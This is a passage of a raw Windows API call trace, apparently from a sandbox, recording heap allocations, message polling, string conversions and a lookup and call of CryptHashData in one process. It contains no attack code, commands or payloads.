hHeap=0x970000) returned 1 [0249.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0249.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0249.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.859] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0249.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0249.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0249.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0249.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0249.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0249.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.956] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0249.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0249.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0249.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.978] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0249.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.987] CryptHashData (hHash=0xa87050, pbData=0x2e54f38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.990] 